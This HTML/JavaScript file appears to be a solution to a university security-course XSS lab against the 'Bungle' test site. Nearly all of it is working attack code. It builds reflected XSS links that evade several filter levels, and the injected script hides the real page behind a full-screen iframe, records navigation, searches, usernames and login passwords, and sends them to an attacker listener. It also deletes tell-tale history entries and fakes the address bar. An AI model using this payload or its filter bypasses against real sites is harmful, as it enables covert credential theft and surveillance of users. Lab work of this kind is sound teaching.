<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
<script>
function payload(attacker) 
{
    {var targetURL=`http://bungle-cs461.cs.illinois.edu/`}
    {var firstFlag = 0}
    {var searchFlag=0}
    {var bufferNext=``}

    function log(data) 
    {
        {console.log($.param(data))}
        {$.get(attacker, data)}
    }
    function proxy() 
    {
	
        {$(`body`).contents().hide()}
	
        {var frameUsed = $(`<iframe id=record>`)
        .attr(`src`,targetURL)
        .attr(`sandbox`, `allow-forms allow-scripts allow-same-origin`)
        .css({
	        width: `100%`,
	        height: `100%`,
	        background: `white`,
	        position: `absolute`,
	        border: 0
	    })
        .appendTo(`body`)
        .load(function() 
        {
    	    $(this.contentDocument)
            .find(`a`)
            .click(function() 
	    {
                {log({event:`nav`, user: $(`#record`).contents().find(`#logged-in-user`).text(),uri: this.href})}
                {window.history.replaceState({},``,this.href)}
            })
            .end()
    	    .find(`form`)
    	    .submit(function() 
    	    {
                if($(this).attr(`action`)==`./search`)
	        {
        		{window.history.replaceState({},``,`http://bungle-cs461.cs.illinois.edu/search?q=` + $(`#_record`).contents().find(`#query`).val())}
        		{log({event:`nav`, user: $(`#record`).contents().find(`#logged-in-user`).text(),uri: `http://bungle-cs461.cs.illinois.edu/search?` + `q=` + $(`#record`).contents().find(`#query`).val()})}
			{searchFlag=1}
			{bufferNext=$(`#record`).contents().find(`#query`).val()}
                }
            	else if($(this).attr(`action`) == `./login`) 
	    	{
        		{log({event: `login`, user:  $(this).serialize().substring( $(this).serialize().indexOf(`=`) + 1,  $(this).serialize().indexOf(`&`)), pass:  $(this).serialize().substring( $(this).serialize().lastIndexOf(`=`) + 1,  $(this).serialize().length)})}
			{window.history.replaceState({},``,targetURL)}
                }
                else if($(this).attr(`action`) == `./logout`)
	    	{
           		{log({event: `logout`, user: $(`#record`).contents().find(`#logged-in-user`).text()})}
			{window.history.replaceState({},``,targetURL)}
                }
            })
           .end()

	    {$(`#record`).contents().find(`.history-item`).remove(`:contains(attacker)`)}
	    if(firstFlag == 0)
	    {
	        {window.history.replaceState({},``,targetURL)}
	        {log({event: `nav`, user: $(`#record`).contents().find(`#logged-in-user`).text(),uri: targetURL})}
	        {firstFlag = 1}
   	    }

	    if(searchFlag){
			{window.history.replaceState({},``,`http://bungle-cs461.cs.illinois.edu/search?q=`+bufferNext)}
			{searchFlag = 0}
	    }
        })}
    }
    {proxy()}
}
function makeLink(xssdefense, target, attacker) 
{
	if(xssdefense==0)
	{
		return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
		encodeURIComponent("<script" + ">" + payload.toString() +
		";payload(\"" +attacker + "\");</script" + ">");
	}
	else if(xssdefense==1)
	{
		return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
		encodeURIComponent("<scrscriptipt" + ">" + payload.toString() +
		";payload(\"" +attacker + "\");</scrscriptipt" + ">");
	}
	else if(xssdefense==2)
	{
		return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
		encodeURIComponent("<body onload = \"payload(`" +attacker +"`);\n"+ payload.toString() +
		">"+"</body" + ">");
	}
	if(xssdefense==4)
	{
		return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
		encodeURIComponent("<script" + ">" + payload.toString() +
		"{payload(`" +attacker + "`)}</script" + ">");
	}
}
var xssdefense = 4;
var target = "http://bungle-cs461.cs.illinois.edu/";
var attacker = "http://127.0.0.1:31337/stolen";
$(window).on("load",function() 
{
	var url = makeLink(xssdefense, target, attacker);
	alert(url)
	window.location.href = url;
});
</script>
